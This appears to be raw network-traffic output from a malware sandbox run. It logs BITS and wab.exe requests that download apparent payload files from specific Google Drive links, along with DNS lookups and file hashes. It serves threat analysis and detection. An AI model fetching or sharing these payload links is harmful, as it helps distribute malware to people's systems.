X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:33 GMT
Expires: Tue, 05 Mar 2024 09:16:33 GMT
Cache-Control: private, max-age=0
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadRemote address:142.250.179.225:443RequestGET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:34 GMT
Expires: Tue, 05 Mar 2024 09:16:34 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=7+PVzg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
HEADhttps://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadRemote address:142.250.179.225:443RequestHEAD /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:42 GMT
Expires: Tue, 05 Mar 2024 09:16:42 GMT
Cache-Control: private, max-age=0
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadRemote address:142.250.179.225:443RequestGET /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 511832
Last-Modified: Mon, 04 Mar 2024 22:35:23 GMT
Date: Tue, 05 Mar 2024 09:16:42 GMT
Expires: Tue, 05 Mar 2024 09:16:42 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=7+PVzg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.78:443RequestGET /uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:17:18 GMT
Location: https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-vELJgGEgfIkajmUD7ZJwEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=downloadwab.exeRemote address:142.250.179.225:443RequestGET /download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: Keep-Alive
Cache-Control: no-cache
Host: drive.usercontent.google.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="LRKVASBQNAJnYAeoGMaND130.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 241728
Last-Modified: Mon, 04 Mar 2024 22:32:42 GMT
Date: Tue, 05 Mar 2024 09:17:20 GMT
Expires: Tue, 05 Mar 2024 09:17:20 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=KuIstA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
411 B 2.7kB 6 4
HTTP Request
GET http://repository.certum.pl/ctnca.cerHTTP Response
200 -
172.217.169.78:443https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSstls, http2.2kB 12.8kB 16 15
HTTP Request
HEAD https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSsHTTP Response
303HTTP Request
GET https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSsHTTP Response
303HTTP Request
HEAD https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSsHTTP Response
303HTTP Request
GET https://drive.google.com/uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSsHTTP Response
303 -
142.250.179.225:443https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadtls, http21.0kB 1.1MB 428 817
HTTP Request
HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadHTTP Response
200HTTP Request
GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadHTTP Response
200HTTP Request
HEAD https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadHTTP Response
200HTTP Request
GET https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadHTTP Response
200 -
172.217.169.78:443https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fitls, httpwab.exe946 B 9.0kB 9 12
HTTP Request
GET https://drive.google.com/uc?export=download&id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fiHTTP Response
303 -
142.250.179.225:443https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=downloadtls, httpwab.exe6.4kB 264.2kB 118 197
HTTP Request
GET https://drive.usercontent.google.com/download?id=1aFcHO3ALeSfDS9t_SnZNsZM1dyOy74fi&export=downloadHTTP Response
200
-
132 B 213 B 2 1
DNS Request
repository.certum.pl
DNS Request
repository.certum.pl
DNS Response
23.48.165.13923.48.165.155
-
62 B 78 B 1 1
DNS Request
drive.google.com
DNS Response
172.217.169.78
-
148 B 90 B 2 1
DNS Request
drive.usercontent.google.com
DNS Request
drive.usercontent.google.com
DNS Response
142.250.179.225
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52666d3a2dd149e0fb67bb637c3444633
SHA1743e85cc0a123264ca873766a2aa1afa1e904050
SHA256073d0e2bbc07ba289c8d46771a8dec37f2e78210909048f508289f8c33b19f65
SHA512cdcdb57fecc2822b598d9b76e6906777e52459b5c28d1c64d233fe5fcdf0a1b62d304a7e8903f64e019fe0e0f7ce466153848819724cbebc33cbdad20ba92e77
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD591bd7f6b5c7e9d3f1b6557a9cced1c27
SHA1399799a5a9e70e557c8d892fc7ad2b655c71d878
SHA256aada99a3378c65a456af17a7f08c77e780ab0f37f0180f7af5a336d794dbad53
SHA512a37e5d6e43504e7cee8e4f0b0f3fc76d6c6ff77b1c66068b50dd59bdda265c3a5443c85f101db32f6cccd2ee5be01e7b4951f8781c8c48f0eeb9d908f0e2e273
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
